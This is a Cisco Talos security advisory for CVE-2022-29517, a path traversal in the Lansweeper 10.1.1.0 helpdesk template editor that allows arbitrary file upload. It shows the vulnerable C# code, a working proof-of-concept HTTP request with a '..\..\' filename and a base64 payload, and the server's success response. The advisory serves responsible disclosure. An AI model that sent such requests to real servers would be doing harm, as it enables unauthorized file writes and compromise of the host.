Headline

CVE-2022-29517: TALOS-2022-1529 || Cisco Talos Intelligence Group

A directory traversal vulnerability exists in the HelpdeskActions.aspx edittemplate functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.

1 year ago

CVE

Open in Source

#vulnerability #web #windows #microsoft #cisco #js #intel #auth #firefox #asp.net

SUMMARY

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Lansweeper lansweeper 10.1.1.0

PRODUCT URLS

lansweeper - https://www.lansweeper.com/

CVSSv3 SCORE

9.9 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

DETAILS

Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and audit purposes.

An exploitable directory traversal vulnerability is related with an action: Helpdesk -> choose any ticket -> Template [editor window] -> Edit any template -> add inline file and is located inside the LS\WS\HelpdeskActions.cs file. Let us take a close look at the vulnerable source code :

Line 1  private static void EditTemplate()
Line 2  {
Line 3      HttpContext current = HttpContext.Current;
Line 4      Page page = (Page)HttpContext.Current.Handler;
Line 5      JsReturnObject jsReturnObject = new JsReturnObject();
Line 6      int num = int.Parse(current.Request["id"]);
Line 7      string text = current.Request["templatetext"];
Line 8      string text2 = current.Request["name"];
Line 9      int value = int.Parse(current.Request["templatecategory"]);
Line 10     bool flag = false;
Line 11     HttpFileCollection files = current.Request.Files;
Line 12     
Line 13             for (int m = 1; m <= int.Parse(current.Request["inlineattachmentste"]); m++)
Line 14             {
Line 15                 int num2 = (current.Request["inlineattachment" + m] ?? "").IndexOf("base64");
Line 16                 if (current.Request["inlineattachment" + m] == null || num2 <= 0)
Line 17                 {
Line 18                     continue;
Line 19                 }
Line 20                 string path = LSFolder.HelpdeskTemplateFiles.GetPath();
Line 21                 
Line 22                 byte[] array2 = Convert.FromBase64String(current.Request["inlineattachment" + m].Substring(num2 + 7));
Line 23                 string text7 = num + "_" + current.Request["inlineattachmentname" + m];
Line 24                 try
Line 25                 {
Line 26                     FileStream fileStream = new FileStream(path + text7, FileMode.CreateNew, FileAccess.Write, FileShare.None);
Line 27                     try
Line 28                     {
Line 29                         fileStream.Write(array2, 0, array2.Length);
Line 30                         flag = true;
Line 31                     }
Line 32                     finally
Line 33                     {
Line 34                         ((IDisposable)fileStream).Dispose();
Line 35                     }
Line 36                 }
Line 37                 catch
Line 38                 {
Line 39                 }
Line 40             }

Creating a ticket template, a user is able to add to it inline files inlineattachment. Each inline file entry has its own name, inlineattachmentname. inlineattachmentname is not sanitized at all in a context of directory traversal, and it is further concatenated in a simple way with a path to helpdesk template files directory line 26. Lack of a proper inlineattachmentname sanitization allows an attacker to upload a file to an arbitrary destination within the file system.

Exploit Proof of Concept

REQUEST

POST /helpdesk/HelpdeskActions.aspx?action=edittemplate&id=2 HTTP/1.1
Host: 192.168.0.102:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------12029611817265063291319576436
Content-Length: 2156
Origin: http://192.168.0.102:81
Connection: close
Referer: http://192.168.0.102:81/helpdesk/ticket.aspx?nonew=-7&tid=24
Cookie: UserSettings=language=1; ASP.NET_SessionId=ke33dhy3jtng0hcwed2fe5av; custauth=username=hacker&userdomain=; __RequestVerificationToken_Lw__=zP2evPOU4gLNF/pF3R1XPsIP7ceImHsHKoqy7GfYwDnIwHnDJKt3r5+0bFTXNS/XpEAiyEFBVT2ekfSLIPgVMULtvi8Ae4qLSYcUO0UH90vcERUKMi72E3I2yEJexWSyNKlA8gcXlfMPYbc0a94Dji44b2cNn4aS0KGOSUQBn/0=
Upgrade-Insecure-Requests: 1

-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="__VIEWSTATE"


-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="name"

Approval
-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="templatetext"

<span><img style="max-width: 950px;" src="/helpdesk/TicketTemplateActions.aspx?action=gettemplateattachment&amp;fileuid=cat123.jpg&amp;templateid=2" alt="cat123.jpg"></span>Thank you, we have received your request.<div><br></div><div>After we got an approval we will execute all required steps in order to provide what you need. We kindly ask for your patience until someone from the helpdesk will contact you.</div><div><br></div><div>In case we would need further information, this ticket will be assigned back to you in state "Awaiting Reply". Please provide necessary details as soon as possible in order to ensure swift processing.</div>
-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="templatecategory"

1
-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="inlineattachment1"

data:application/octet-stream;base64,WW91IGhhdmUgYmVlbiAwd24zZCE=
-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="inlineattachmentname1"

..\..\..\..\..\..\..\HACKED.jpg
-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="inlineattachment3"

data:text/plain;base64,dmVyc2lvbj0xOS4wLjAKY2xpZW50PWZpcmViYXNlLWFuYWx5dGljcwpmaXJlYmFzZS1hbmFseXRpY3NfY2xpZW50PTE5LjAuMAo=
-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="inlineattachmentname3"

firebase-analytics.jpg
-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="inlineattachmentste"

3
-----------------------------12029611817265063291319576436
Content-Disposition: form-data; name="filestodelete"


-----------------------------12029611817265063291319576436--

RESPONSE

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.0
x-frame-options: SAMEORIGIN
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 07 Jun 2022 13:32:56 GMT
Connection: close
Content-Length: 173

{"ErrorType":"","Error":false,"Emsg":"","AddedRows":[["Approval","1","True"]],"Columns":[],"Columnwid":[],"Action":"","ReturnValues":{},"ReturnValue":"","ReturnObject":null}

TIMELINE

2022-06-27 - Vendor Disclosure
2022-11-29 - Vendor Patch Release
2022-12-01 - Public Release

Discovered by Marcin ‘Icewall’ Noga of Cisco Talos.

Marcin ‘Icewall’ Noga of Cisco Talos discovered these vulnerabilities. Cisco Talos recently discovered several directory traversal and cross-site scripting vulnerabilities in Lansweeper. Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and

1 year ago

TALOS

Open in Source

#xss #vulnerability #cisco #java